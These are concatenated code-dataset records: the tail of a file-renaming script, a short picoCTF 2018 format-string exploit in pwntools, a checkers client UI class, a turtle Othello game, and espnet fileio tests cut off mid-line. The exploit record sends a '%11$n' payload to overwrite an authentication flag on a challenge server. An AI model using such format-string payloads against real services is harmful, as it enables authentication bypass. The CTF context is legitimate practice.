'E', 'MartinICandFinalEddandOM', 'softD2']\n\nmodules = [\"readVDF_2_new\", \"fileLsts\", \"readVDF2\", \"VDFnetwork\", \"readVDF\",\n \"TimeEvolutionGammaKappaBeta\", \"Sigma\", \"readVDF_2_new\"]\n\n# folders = [f'{txtFilePath}/{i}' for i in sims]\n\n'''\nfor i in sims:\n vars()[i] = f'{txtFilePath}/{i}'\n'''\n\nfile_name = ''\nline = ''\n# readfile = f'{modules[2]}.txt'\n# writefile = f'{modules[2]}_copy.txt'\nreadfile = 'testfile.txt'\nwritefile = 'testfile_copy.txt'\n\nfilename_dict = {'Hernquist': 'HQ',\n 'Hq': 'HQ',\n 'Osipkov': 'O',\n 'Merritt': 'M',\n 'phi': 'Phi',\n 'theta': 'Theta',\n 'Gamma_-1.50': 'Gamma_-1.5',\n 'Gamma_-2.00': 'Gamma_-2.0',\n 'Gamma_-2.50': 'Gamma_-2.5',\n 'Gamma_-3.00': 'Gamma_-3.0'\n }\n\nline_dict = {'Eddington': 'Edd',\n 'perturbation': 'Pert',\n 'Hernquist': 'HQ',\n 'Hq': 'HQ',\n 'Osipkov_Merritt': 'OM',\n 'Osipkov': 'O',\n 'Merritt': 'M',\n 'figure_path': 'figurePath',\n 'datalist_innerbin': 'bin1',\n 'datalist_first_middlebin': 'bin2',\n 'datalist_second_middlebin': 'bin3',\n 'datalist_outerbin': 'bin4',\n 'list_of_files_': 'FileLst',\n 'innerbin_': 'bin1',\n 'first_middlebin_': 'bin2',\n 'second_middlebin_': 'bin3',\n 'outerbin_': 'bin4',\n 'radial_bins': 'RBins',\n 'R_limit': 'Rlim',\n 'Almost_Final': 'SecondLast',\n 'phi': 'Phi',\n 'theta': 'Theta',\n '_new_R_middle_': '',\n 'large_R_middle_19_95_': 'bin5',\n 'large_R_middle_31_62_': 'bin6',\n '_large_R_middle_': '',\n '\\'/Users/gustav.c.rasmussen': 'os.getcwd() + \\'',\n 'Red': 'r',\n 'Green': 'g',\n 'Black': 'k',\n 'Blue': 'b',\n '_average_inside_bin_': '_BinAvg_',\n '_avg_in_bin_': '_BinAvg_',\n 'average_': 'avg_',\n 'color=': '',\n 'color =': '',\n ' )': ')',\n 'data, label': 'data, _'\n }\n\n\ndef find_replace_multi_ordered(string, dictionary):\n # sort keys by length, in reverse order\n for item in sorted(dictionary.keys(), key=len, reverse=True):\n string = re.sub(item, dictionary[item], string)\n return string\n\n\ns = \"HEREABCISABCACSAMPLEABCSTRING\"\nd = {\"C\": \"-\", \"ABC\": \"-\", \"CSAMPLEABC\": \"-:)-\"}\n# find_replace_multi_ordered(s, d)\n\n\ndef file_replace(From: str, to: str, in_str: str=''):\n \"\"\".\"\"\"\n if in_str in file_name:\n return file_name.replace(From, to)\n return file_name\n\n\ndef rename_files(files):\n for f in files:\n if f == '.DS_Store':\n continue\n file_name, file_ext = os.path.splitext(f)\n # print(file_name)\n # for k, v in filename_dict.items():\n # file_name = file_replace(k, v)\n file_name = find_replace_multi_ordered(file_name, filename_dict)\n file_name = file_replace('rad', 'R', 'Sigmarad')\n file_name = file_replace('tan', 'T', 'Sigmatan')\n if ('LargeRMiddle' in file_name) and ('RMiddle' in file_name):\n file_name = file_name.replace('LargeRMiddle', '')\n file_name = file_name.replace('RMiddle', 'LargeRMiddle')\n new_name = regexUpper.regex_sub_upper(file_name)\n new_file = f'{new_name}{file_ext}'\n # print(f'{new_file}')\n os.rename(f, new_file)\n\n\ndef line_replace(From: str, to: str, in_str: str=''):\n \"\"\".\"\"\"\n if in_str in line:\n return line.replace(From, to)\n return line\n\n\ndef replace_lines():\n with open(readfile, \"r\") as rf, open(writefile, \"w\") as wf:\n for line in rf:\n # for k, v in line_dict.items():\n # line = line_replace(k, v)\n line = find_replace_multi_ordered(line, line_dict)\n # line = line_replace('yan', '', 'cyan')\n # line = line_replace('agenta', '', 'magenta')\n # line = line_replace('hite', '', 'white')\n if any(x in line for x in ['Sigmarad', 'sigmarad']):\n line = line.replace('rad', 'R')\n if any(x in line for x in ['Sigmatan', 'sigmatan']):\n line = line.replace('tan', 'T')\n # if label, ls: swap to ls, label.\n # Put ls and color together.\n if re.findall(regexUpper.pattern_1, line):\n print(line)\n # print(re.sub(regexUpper.sub_pattern, '', line))\n line = re.sub(regexUpper.sub_pattern, '', line)\n print(line)\n wf.write(line)\n\n\ndef main():\n # print(readfile, writefile)\n replace_lines()\n '''\n print(len(os.listdir()))\n with change_dir(sims[0]):\n # print(os.listdir())\n rename_files(os.listdir())\n '''\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Scripts/Maintenance/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"562578384","text":"from pwn import *\nfrom time import sleep\ndef main():\n r = remote('2018shell1.picoctf.com', 27114)\n offset = 11\n alamat_auth = p32(0x0804a04c)\n p = alamat_auth + \"%\" + str(offset) + \"$n\"\n r.sendline(p)\n r.interactive()\n\nif __name__ == '__main__':\n main()\n","sub_path":"picoCTF2018/pwned/authenticate/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"391865617","text":"\"\"\"\nCS 544\nJune 6, 2018\nThis file contains the Interface class. It provides the basic hooks that the Client needs\ninto the interface to get all the needed user input. Very basic interface.\n\"\"\"\n\nfrom getpass import getpass\nfrom typing import Tuple\n\nfrom internal_types.types import Direction, Move, Board\n\n\nclass Interface:\n \"\"\"\n Basic user interface\n UI\n \"\"\"\n\n def display_message(self, message: str):\n \"\"\"\n Print a message to the screen\n :param message:\n \"\"\"\n print(message)\n\n def display(self, board: Board):\n \"\"\"\n Display a Board on the screen\n :param board: The Board to display\n \"\"\"\n print(\"___________________\")\n print(\"| |1|2|3|4|5|6|7|8|\")\n for i in reversed(range(8)):\n print(\"-------------------\")\n output_str = \"|{}|\".format(8 - i)\n for j in reversed(range(8)):\n pos = board[j, i]\n if not pos.used:\n letter = ' '\n elif pos.owner and pos.promoted:\n letter = 'O'\n elif pos.owner and not pos.promoted:\n letter = 'o'\n elif not pos.owner and pos.promoted:\n letter = 'X'\n elif not pos.owner and not pos.promoted:\n letter = 'x'\n else:\n raise Exception(\"Invalid Board\")\n output_str += \"{}|\".format(letter)\n print(output_str)\n print(\"-------------------\")\n\n def get_move(self) -> Move:\n def get_location():\n try:\n x = int(input(\"X value for piece to move:\"))\n y = int(input(\"Y value for piece to move:\"))\n return x - 1, y - 1\n except ValueError:\n self.display_message(\"Please enter values from 1-8\")\n return get_location()\n\n def get_direction():\n def get_x_dir():\n first_input = input(\"Would you like to move the piece left or right? (left/right): \")\n if first_input == \"left\":\n return Direction.Negative\n elif first_input == \"right\":\n return Direction.Positive\n else:\n return get_x_dir()\n\n def get_y_dir():\n first_input = input(\"Would you like to move the piece up or down? (up/down): \")\n if first_input == \"up\":\n return Direction.Negative\n elif first_input == \"down\":\n return Direction.Positive\n else:\n return get_y_dir()\n\n return get_x_dir(), get_y_dir()\n\n return Move(*get_location(), *get_direction())\n\n def game_over(self, final_board: Board, old_rating: int, new_rating: int, you_won: bool):\n \"\"\"\n Display a game end\n :param final_board: Board at the end of the game\n :param old_rating: Rating before the game\n :param new_rating: Rating after the game\n :param you_won: If the user won ro not\n \"\"\"\n self.display(final_board)\n if you_won:\n self.display_message(\"You won!\")\n else:\n self.display_message(\"You lost :(\")\n self.display_message(\"Your Rating changed from {} -> {}\".format(old_rating, new_rating))\n\n def prompt_play_again(self) -> bool:\n \"\"\"\n Ask the player if they want to play again\n :return: Whether or not the User wants to play again\n \"\"\"\n input_str = input(\"Play again? yes/no: \")\n if input_str == \"yes\":\n return True\n elif input_str == \"no\":\n return False\n else:\n return self.prompt_play_again()\n\n def request_credentials(self) -> Tuple[bytes, bytes]:\n \"\"\"\n Prompt the user for username and password\n :return: Username and password\n \"\"\"\n return self.request_username(), self.request_pass()\n\n def request_username(self) -> bytes:\n \"\"\"\n Prompt the user for a username\n :return: Username\n \"\"\"\n return str.encode(input(\"Please input your Username: \"))\n\n def request_pass(self) -> bytes:\n \"\"\"\n Prompt the user for their password\n :return: Password\n \"\"\"\n return str.encode(getpass(\"Please input your Password: \"))\n\n def show_queue_position(self, position: int, rating: int, queue_size: int):\n \"\"\"\n Update in the UI where the user is in queue currently\n :param position: Position in Queue\n :param rating: The User's current rating\n :param queue_size: The length of the queue\n \"\"\"\n self.display_message(\"Position in Queue: {}, Rating: {}, Queue size: {}\".format(position, rating, queue_size))\n\n def game_start(self, opponent_name: str, opponent_rating: int):\n \"\"\"\n Message for when a game starts\n :param opponent_name: The name of the opponent\n :param opponent_rating: The rating of the opponent\n \"\"\"\n self.display_message(\"Starting game vs {} ({})\".format(opponent_name, opponent_rating))\n\n def opponent_left(self):\n \"\"\"\n Display when an opponent leaves\n \"\"\"\n self.display_message(\"Your Opponent Disconnected\")\n","sub_path":"client/Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":5338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"417326943","text":"# Author: Philip Baranov\n\nimport turtle\nimport random\n\n# GLOBAL constants:\nGAP = 90\t\t\t\t # Distance between the centers of two adjacent cells.\nTOPLEFTX = -320\t\t # X-coordinate of the top-left cell.\nTOPLEFTY = 360\t\t\t # Y-oordinate of the top-left cell.\ncellSize = 4\t\t\t # Size of a single square.\ntokenSize = cellSize * 0.8 # Size of a single token.\n\n# Stamps square cells, 2 at a time, alternating between two colors.\n# First it stamps a black square, and then a slightly smaller green/lightgreen square inside of it.\n# It creates a nice thin black outline that makes the grid look a little nicer.\ndef stampCell(turtle, firstColor, secondColor):\n\tturtle.shape('square')\n\tturtle.shapesize(cellSize)\n\tturtle.color('black')\n\tturtle.stamp()\n\n\tturtle.color(firstColor)\n\tturtle.shapesize(cellSize * 0.95)\n\tturtle.stamp()\n\tturtle.fd(GAP)\n\n\tturtle.shapesize(cellSize)\n\tturtle.color('black')\n\tturtle.stamp()\n\n\tturtle.color(secondColor)\n\tturtle.shapesize(cellSize * 0.95)\n\tturtle.stamp()\n\tturtle.fd(GAP)\n\ndef drawGrid():\n\tcount = 0\n\tturtle.goto(TOPLEFTX, TOPLEFTY + 50)\n\n\tfor col in range(8):\n\t\tturtle.write(col, font = ('Arial', 12, 'bold'))\n\t\tturtle.setx(turtle.xcor() + GAP)\n\n\tturtle.goto(TOPLEFTX, TOPLEFTY)\n\n\tfor row in range(4):\n\t\tturtle.color('black')\n\t\tturtle.goto(turtle.xcor() - 70, turtle.ycor() - 7.5)\n\t\tturtle.write(count, font = ('Arial', 12, 'bold'))\n\t\tturtle.goto(turtle.xcor() + 70, turtle.ycor() + 7.5)\n\t\tcount += 1\n\n\t\tfor rowDarkLight in range(4):\n\t\t\tfirstColor = 'green'\n\t\t\tsecondColor = 'lightgreen'\n\t\t\tstampCell(turtle, firstColor, secondColor)\n\n\t\tturtle.goto(turtle.xcor() - 8 * GAP, turtle.ycor() - GAP)\n\t\tturtle.color('black')\n\t\tturtle.goto(turtle.xcor() - 70, turtle.ycor() - 7.5)\n\t\tturtle.write(count, font = ('Arial', 12, 'bold'))\n\t\tturtle.goto(turtle.xcor() + 70, turtle.ycor() + 7.5)\n\n\t\tfor rowLightDark in range(4):\n\t\t\tfirstColor = 'lightgreen'\n\t\t\tsecondColor = 'green'\n\t\t\tstampCell(turtle, firstColor, secondColor)\n\n\t\tturtle.goto(turtle.xcor() - 8 * GAP, turtle.ycor() - GAP)\n\t\tcount += 1\n\ndef stampToken(color):\n\tturtle.shape('circle')\n\tturtle.shapesize(tokenSize)\n\tturtle.color('black')\n\tturtle.stamp()\n\tturtle.shapesize(tokenSize * 0.925)\n\tturtle.color(color)\n\tturtle.stamp()\n\n# Places 4 initial tokens on the grid.\ndef placeTokens(board):\n\tcolor = 'white'\n\tturtle.goto(3 * GAP + TOPLEFTX, TOPLEFTY - 3 * GAP)\n\tstampToken(color)\n\trow = int((TOPLEFTY - turtle.ycor()) // GAP)\n\tcol = int((turtle.xcor() - TOPLEFTX) // GAP)\n\tboard[row][col] = color\n\n\tcolor = 'black'\n\tturtle.goto(4 * GAP + TOPLEFTX, TOPLEFTY - 3 * GAP)\n\tstampToken(color)\n\trow = int((TOPLEFTY - turtle.ycor()) // GAP)\n\tcol = int((turtle.xcor() - TOPLEFTX) // GAP)\n\tboard[row][col] = color\n\n\tcolor = 'black'\n\tturtle.goto(3 * GAP + TOPLEFTX, TOPLEFTY - 4 * GAP)\n\tstampToken(color)\n\trow = int((TOPLEFTY - turtle.ycor()) // GAP)\n\tcol = int((turtle.xcor() - TOPLEFTX) // GAP)\n\tboard[row][col] = color\n\n\tcolor = 'white'\n\tturtle.goto(4 * GAP + TOPLEFTX, TOPLEFTY - 4 * GAP)\n\tstampToken(color)\n\trow = int((TOPLEFTY - turtle.ycor()) // GAP)\n\tcol = int((turtle.xcor() - TOPLEFTX) // GAP)\n\tboard[row][col] = color\n\n# Checks if the cell (row, column) combination is occupied.\ndef isVacant(board, row, col):\n\tif board[row][col] == 0:\n\t\treturn True\n\n# Checks if there are neighbors of the opposite color\ndef checkNeighbors(board, row, col, color):\n\tneighborslist = []\n\n\tif color == 'white':\n\t\topcolor = 'black'\n\telif color == 'black':\n\t\topcolor = 'white'\n\n\tif row == 0:\n\t\tfor testrow in range(row, row + 2):\n\t\t\tif col == 0:\n\t\t\t\tfor testcol in range(col, col + 2):\n\t\t\t\t\tif board[testrow][testcol] == opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\t\t\telif col == 7:\n\t\t\t\tfor testcol in range(col - 1, col + 1):\n\t\t\t\t\tif board[testrow][testcol] == opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\t\t\telse:\n\t\t\t\tfor testcol in range(col - 1, col + 2):\n\t\t\t\t\tif board[testrow][testcol] == opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\telif row == 7:\n\t\tfor testrow in range(row - 1, row + 1):\n\t\t\tif col == 0:\n\t\t\t\tfor testcol in range(col, col + 2):\n\t\t\t\t\tif board[testrow][testcol] == opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\t\t\telif col == 7:\n\t\t\t\tfor testcol in range(col - 1, col + 1):\n\t\t\t\t\tif board[testrow][testcol] == opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\t\t\telse:\n\t\t\t\tfor testcol in range(col - 1, col + 2):\n\t\t\t\t\tif board[testrow][testcol] == opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\telse:\n\t\tfor testrow in range(row - 1, row + 2):\n\t\t\tif col == 0:\n\t\t\t\tfor testcol in range(col, col + 2):\n\t\t\t\t\tif board[testrow][testcol] == opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\t\t\telif col == 7:\n\t\t\t\tfor testcol in range(col - 1, col + 1):\n\t\t\t\t\tif board[testrow][testcol] == opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\t\t\telse:\n\t\t\t\tfor testcol in range(col - 1, col + 2):\n\t\t\t\t\tif board[testrow][testcol] == opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\n\tfor i in neighborslist:\n\t\tif i[0] == row and i[1] == col:\n\t\t\tneighborslist.remove(i)\n\n\treturn neighborslist\n\n# Check if at least one of the straight lines starting from row, col and\n# continuing horizontally, vertically or diagonally in any direction,\n# starts with an opponent's token and end with a token matching\n# the 'color' argument.\n# It starts at the neighboring cell of the opposite color, and checks if there are\n# more cells of the same color as this one. If yes, it moves onto the next cell.\n# If the next cell is the player's color, the function adds the direction to the list of valid directions.\n# If it is unoccupied or the grid ends, it does nothing.\ndef checkStraightLine(board, row, col, testrow, testcol, color):\n\tvalidlist = []\n\txdir = testcol - col\t# The horizontal direction of an opposite-colored neghboring cell. If it's behind, xdir = -1. If it's in the front - xdir = 1.\n\tydir = testrow - row\t# The vertical direction of an opposite-colored neghboring cell. If it's above, ydir = -1. If it's below - ydir = 1.\n\trow = testrow\n\tcol = testcol\n\n\twhile board[row][col] != color and board[row][col] != 0 and row + ydir in range(0, 8) and col + xdir in range(0, 8):\n\t\tcol += xdir\n\t\trow += ydir\n\n\t\tif board[row][col] == color:\n\t\t\tvalidlist.append((ydir, xdir))\n\n\treturn validlist\n\n# Combines previous three functions.\n# If the first function is \"True\", the second and the third one aren't empty lists,\n# the move is \"valid\".\ndef isValidMove(board, row, col, color):\n\tif isVacant(board, row, col) == True:\n\t\tif len(checkNeighbors(board, row, col, color)) > 0:\n\t\t\tfor i in checkNeighbors(board, row, col, color):\n\t\t\t\ttestrow = i[0]\n\t\t\t\ttestcol = i[1]\n\t\t\t\tif len(checkStraightLine(board, row, col, testrow, testcol, color)) > 0:\n\t\t\t\t\treturn True\n\t\treturn False\n\treturn False\n\ndef getValidMoves(board, color):\n\tvalidlist = []\n\n\tfor row in range(8):\n\t\tfor col in range(8):\n\t\t\tif isValidMove(board, row, col, color) == True:\n\t\t\t\tvalidlist.append(tuple([row, col]))\n\n\treturn validlist\n\n# This function flips the opponent's tokens.\n# Similarly to the \"checkStraightLine\" function, it goes through pretty much the same steps\n# stamping a token of the opposite color and updating the board matrix with each step.\n# After it reaches a cell with a token of the controlling player's color, it stops.\ndef flipTokens(board, row, col, xdir, ydir, color):\n\trow = row + ydir\n\tcol = col + xdir\n\n\twhile board[row][col] != color and board[row][col] != 0 and row + ydir in range(0, 8) and col + xdir in range(0, 8):\n\t\tturtle.goto((col) * GAP + TOPLEFTX, TOPLEFTY - (row) * GAP)\n\t\tturtle.color(color)\n\t\tstampToken(color)\n\t\tboard[row][col] = color\n\t\trow += ydir\n\t\tcol += xdir\n\t\tif board[row][col] == color:\n\t\t\treturn\n\n# Turn of the human player.\n# Cchecks if there are any moves available. If not -the game ends.\n# If the player enters invalid row and column numbers, or just some random gibberish, the function will keep\n# asking ask for a valid input.\n# If the player presses \"Cancel\" or inputs a null string, the game stops.\ndef humanTurn(board):\n\tcolor = 'black'\n\n\tif len(getValidMoves(board, color))<1:\n\t\treturn False\n\n\tintcoords = turtle.textinput('', 'Enter \"row, column\". With a coma in between:')\n\n\tif intcoords == '' or intcoords == None:\n\t\treturn False\n\tif len(intcoords)<3 or intcoords[0].isdigit() == False or intcoords[2].isdigit() == False:\n\t\thumanTurn(board)\n\n\trow = int(intcoords[0])\n\tcol = int(intcoords[2])\n\tturtle.color(color)\n\n\tif isValidMove(board, row, col, color) == True:\n\t\tturtle.goto(int(col) * GAP + TOPLEFTX, TOPLEFTY - int(row) * GAP)\n\t\tstampToken(color)\n\t\tboard[row][col] = color\n\n\t\tfor i in checkNeighbors(board, row, col, color):\n\t\t\ttestrow = i[0]\n\t\t\ttestcol = i[1]\n\t\t\tfor i in checkStraightLine(board, row, col, testrow, testcol, color):\n\t\t\t\txdir = i[1]\n\t\t\t\tydir = i[0]\n\t\t\t\tflipTokens(board, row, col, xdir, ydir, color)\n\telse:\n\t\thumanTurn(board)\n\n# Computer turn.\n# Generates a random cell out of a list of valid cells, and moves there.\n# If there are no more valid moves - the game ends.\ndef selectNextPlay(board):\n\tcolor = 'white'\n\n\tif len(getValidMoves(board, color))<1:\n\t\treturn False\n\n\tindex = random.randint(0, len(getValidMoves(board, color)) - 1)\n\tcell = getValidMoves(board, color)[index]\n\trow = cell[0]\n\tcol = cell[1]\n\tturtle.color(color)\n\tturtle.goto(int(col) * GAP + TOPLEFTX, TOPLEFTY - int(row) * GAP)\n\tstampToken(color)\n\tboard[row][col] = color\n\n\tfor i in checkNeighbors(board, row, col, color):\n\t\ttestrow = i[0]\n\t\ttestcol = i[1]\n\t\tfor i in checkStraightLine(board, row, col, testrow, testcol, color):\n\t\t\txdir = i[1]\n\t\t\tydir = i[0]\n\t\t\tflipTokens(board, row, col, xdir, ydir, color)\n\n# Creates a scoreboard. Keeps track of the player's and the computer's scores.\n# After the game ends, either declares a victor or a draw.\ndef score(board):\n\tplayerScore = 0\n\tcomputerScore = 0\n\tscoreList = [0, 0]\n\n\tfor row in range(8):\n\t\tfor col in range(8):\n\t\t\tif board[row][col] == 'black':\n\t\t\t\tplayerScore += 1\n\t\t\t\tscoreList[0] = playerScore\n\t\t\telif board[row][col] == 'white':\n\t\t\t\tcomputerScore += 1\n\t\t\t\tscoreList[1] = computerScore\n\n\tif scoreList[0] > scoreList[1]:\n\t\tscoreList.append(\"You win!\")\n\telif scoreList[0]<scoreList[1]:\n\t\tscoreList.append(\"Computer wins!\")\n\telse:\n\t\tscoreList.append(\"Draw!\")\n\n\treturn scoreList\n\n# Human turn + computer turn + update the scoreboard.\n# The game runs until either player no longer has any moves left.\ndef turn(board):\n\tif humanTurn(board)!= False and selectNextPlay(board)!= False:\n\t\tturn(board)\n\n\tturtle.color('black')\n\t\n\tturtle.goto(TOPLEFTX + 0.5 * GAP, TOPLEFTY - 8 * GAP)\n\tturtle.write('Player: ' + str(score(board)[0]), align = 'center', font = (\"Arial\", 30, \"bold\"))\n\n\tturtle.goto(TOPLEFTX + 6 * GAP, TOPLEFTY - 8 * GAP)\n\tturtle.write(\"Computer: \" + str(score(board)[1]), align = 'center', font = (\"Arial\", 30, \"bold\"))\n\n\tturtle.goto(TOPLEFTX + 3.5 * GAP, TOPLEFTY - 8.5 * GAP)\n\tturtle.write(score(board)[2], align = 'center', font = (\"Arial\", 30, \"bold\"))\n\n# The board matrix starts with all cells being vacant(0). It updates every time\n# a token is stamped.\ndef main():\n\tBOARD = [\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0]\n\t\t]\n\n\tturtle.setup(850, 900)\n\tturtle.hideturtle()\n\tturtle.speed(0)\n\tturtle.penup()\n\n\tdrawGrid()\n\tplaceTokens(BOARD)\n\tturn(BOARD)\n\n\tturtle.done()\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"Python/othello.py","file_name":"othello.py","file_ext":"py","file_size_in_byte":11400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"590418561","text":"from pathlib import Path\n\nimport numpy as np\nimport pytest\nimport soundfile\n\nfrom espnet2.utils.fileio import DatadirWriter\nfrom espnet2.utils.fileio import load_num_sequence_text\nfrom espnet2.utils.fileio import NpyScpReader\nfrom espnet2.utils.fileio import NpyScpWriter\nfrom espnet2.utils.fileio import read_2column_text\nfrom espnet2.utils.fileio import SoundScpReader\nfrom espnet2.utils.fileio import SoundScpWriter\n\n\ndef test_read_2column_text(tmp_path: Path):\n p = tmp_path / \"dummy.scp\"\n with p.open(\"w\") as f:\n f.write(f\"abc /some/path/a.wav\\n\")\n f.write(f\"def /some/path/b.wav\\n\")\n d = read_2column_text(p)\n assert d == {\"abc\": \"/some/path/a.wav\", \"def\": \"/some/path/b.wav\"}\n\n\n@pytest.mark.parametrize(\n \"loader_type\", [\"text_int\", \"text_float\", \"csv_int\", \"csv_float\", \"dummy\"]\n)\ndef test_load_num_sequence_text(loader_type: str, tmp_path: Path):\n p = tmp_path / \"dummy.txt\"\n if \"csv\" in loader_type:\n delimiter = \",\"\n else:\n delimiter = \" \"\n\n with p.open(\"w\") as f:\n f.write(\"abc \" + delimiter.join([\"0\", \"1\", \"2\"]) + \"\\n\")\n f.write(\"def \" + delimiter.join([\"3\", \"4\", \"5\"]) + \"\\n\")\n desired = {\"abc\": np.array([0, 1, 2]), \"def\": np.array([3, 4, 5])}\n if loader_type == \"dummy\":\n with pytest.raises(ValueError):\n load_num_sequence_text(p, loader_type=loader_type)\n return\n else:\n target = load_num_sequence_text(p, loader_type=loader_type)\n for k in desired:\n np.testing.assert_array_equal(target[k], desired[k])\n\n\ndef test_load_num_sequence_text_invalid(tmp_path: Path):\n p = tmp_path / \"dummy.txt\"\n with p.open(\"w\") as f:\n f.write(\"abc 12.3.3.,4.44\\n\")\n with pytest.raises(ValueError):\n load_num_sequence_text(p)\n\n with p.open(\"w\") as f:\n f.write(\"abc\\n\")\n with pytest.raises(RuntimeError):\n load_num_sequence_text(p)\n\n with p.open(\"w\") as f:\n f.write(\"abc 1 2\\n\")\n f.write(\"abc 2 4\\n\")\n with pytest.raises(RuntimeError):\n load_num_sequence_text(p)\n\n\ndef test_DatadirWriter(tmp_path: Path):\n writer = DatadirWriter(tmp_path)\n # enter(), __exit__(), close()\n with writer as f:\n # __getitem__()\n sub = f[\"aa\"]\n # __setitem__()\n sub[\"bb\"] = \"aa\"\n\n with pytest.raises(TypeError):\n sub[\"bb\"] = 1\n with pytest.raises(RuntimeError):\n # Already has children\n f[\"aa\"] = \"dd\"\n with pytest.raises(RuntimeError):\n # Is a text\n sub[\"cc\"]\n\n # Create a directory, but set mismatched ids\n f[\"aa2\"][\"ccccc\"] = \"aaa\"\n # Duplicated warning\n f[\"aa2\"][\"ccccc\"] = \"def\"\n\n\ndef test_SoundScpReader(tmp_path: Path):\n audio_path1 = tmp_path / \"a1.wav\"\n audio1 = np.random.randint(-100, 100, 16, dtype=np.int16)\n audio_path2 = tmp_path / \"a2.wav\"\n audio2 = np.random.randint(-100, 100, 16, dtype=np.int16)\n\n soundfile.write(audio_path1, audio1, 16)\n soundfile.write(audio_path2, audio2, 16)\n\n p = tmp_path / \"dummy.scp\"\n with p.open(\"w\") as f:\n f.write(f\"abc {audio_path1}\\n\")\n f.write(f\"def {audio_path2}\\n\")\n\n desired = {\"abc\": (16, audio1), \"def\": (16, audio2)}\n target = SoundScpReader(p, normalize=False, dtype=np.int16)\n\n for k in desired:\n rate1, t = target[k]\n rate2, d = desired[k]\n assert rate1 == rate2\n np.testing.assert_array_equal(t, d)\n\n assert len(target) == len(desired)\n assert \"abc\" in target\n assert \"def\" in target\n assert tuple(target.keys()) == tuple(desired)\n assert tuple(target) == tuple(desired)\n assert target.get_path(\"abc\") == str(audio_path1)\n assert target.get_path(\"def\") == str(audio_path2)\n\n\ndef test_SoundScpReader_normalize(tmp_path: Path):\n audio_path1 = tmp_path / \"a1.wav\"\n audio1 = np.random.randint(-100, 100, 16, dtype=np.int16)\n audio_path2 = tmp_path / \"a2.wav\"\n audio2 = np.random.randint(-100, 100, 16, dtype=np.int16)\n\n audio1 = audio1.astype(np.float64) / (np.iinfo(np.int16).max + 1)\n audio2 = audio2.astype(np.float64) / (np.iinfo(np.int16).max + 1)\n\n soundfile.write(audio_path1, audio1, 16)\n soundfile.write(audio_path2, audio2, 16)\n\n p = tmp_path / \"dummy.scp\"\n with p.open(\"w\") as f:\n f.write(f\"abc {audio_path1}\\n\")\n f.write(f\"def {audio_path2}\\n\")\n\n desired = {\"abc\": (16, audio1), \"def\": (16, audio2)}\n target = SoundScpReader(p, normalize=True)\n\n for k in desired:\n rate1, t = target[k]\n rate2, d = desired[k]\n assert rate1 == rate2\n np.testing.assert_array_equal(t, d)\n\n\ndef test_SoundScpWriter(tmp_path: Path):\n audio1 = np.random.randint(-100, 100, 16, dtype=np.int16)\n audio2 = np.random.randint(-100, 100, 16, dtype=np.int16)\n with SoundScpWriter(tmp_path, tmp_path / \"wav.scp\", dtype=np.int16) as writer:\n writer[\"abc\"] = 16, audio1\n writer[\"def\"] = 16, audio2\n # Unsupported dimension\n with pytest.raises(RuntimeError):\n y = np.random.randint(-100, 100, [16, 1, 1], dtype=np.int16)\n writer[\"ghi\"] = 16, y\n target = SoundScpReader(tmp_path / \"wav.scp\", normalize=False, dtype=np.int16)\n desired = {\"abc\": (16, audio1), \"def\": (16, audio2)}\n\n for k in desired:\n rate1, t = target[k]\n rate2, d = desired[k]\n assert rate1 == rate2\n np.testing.assert_array_equal(t, d)\n\n assert writer.get_path(\"abc\") == str(tmp_path / \"abc.wav\")\n assert writer.get_path(\"def\") == str(tmp_path / \"def.wav\")\n\n\ndef test_SoundScpWriter_normalize(tmp_path: Path):\n audio1 = np.random.randint(-100, 100, 16, dtype=np.int16)\n audio2 = np.random.randint(-100, 100, 16, dtype=np.int16)\n audio1 = audio1.astype(np.float64) / (np.iinfo(np.int16).max + 1)\n audio2 = audio2.astype(np.float64) / (np.iinfo(np.int16).max + 1)\n\n with SoundScpWriter(tmp_path, tmp_path / \"wav.scp\", dtype=np.int16) as writer:\n writer[\"abc\"] = 16, audio1\n writer[\"def\"] = 16, audio2\n # Unsupported dimension\n with pytest.raises(RuntimeError):\n y = np.random.randint(-100, 100, [16, 1, 1], dtype=np.int16)\n writer[\"ghi\"] = 16, y\n target = SoundScpReader(tmp_path / \"wav.scp\", normalize=True, dtype=np.float64)\n desired = {\"abc\": (16, audio1), \"def\": (16, audio2)}\n\n for k in desired:\n rate1, t = target[k]\n rate2, d = desired[k]\n assert rate1 == rate2\n np.testing.assert_array_equal(t, d)\n\n\ndef test_NpyScpReader(tmp_path: Path):\n npy_path1 = tmp_path / \"a1.npy\"\n array1 = np.random.randn(1)\n npy_path2 = tmp_path / \"a2.npy\"\n array2 = np.random.randn(1, 1, 10)\n np.save(npy_path1, array1)\n np.save(npy_path2, array2)\n\n p = tmp_path / \"dummy.scp\"\n with p.open(\"w\") as f:\n f.write(f\"abc {npy_path1}\\n\")\n f.write(f\"def {npy_path2}\\n\")\n\n desired = {\"abc\": array1, \"def\": 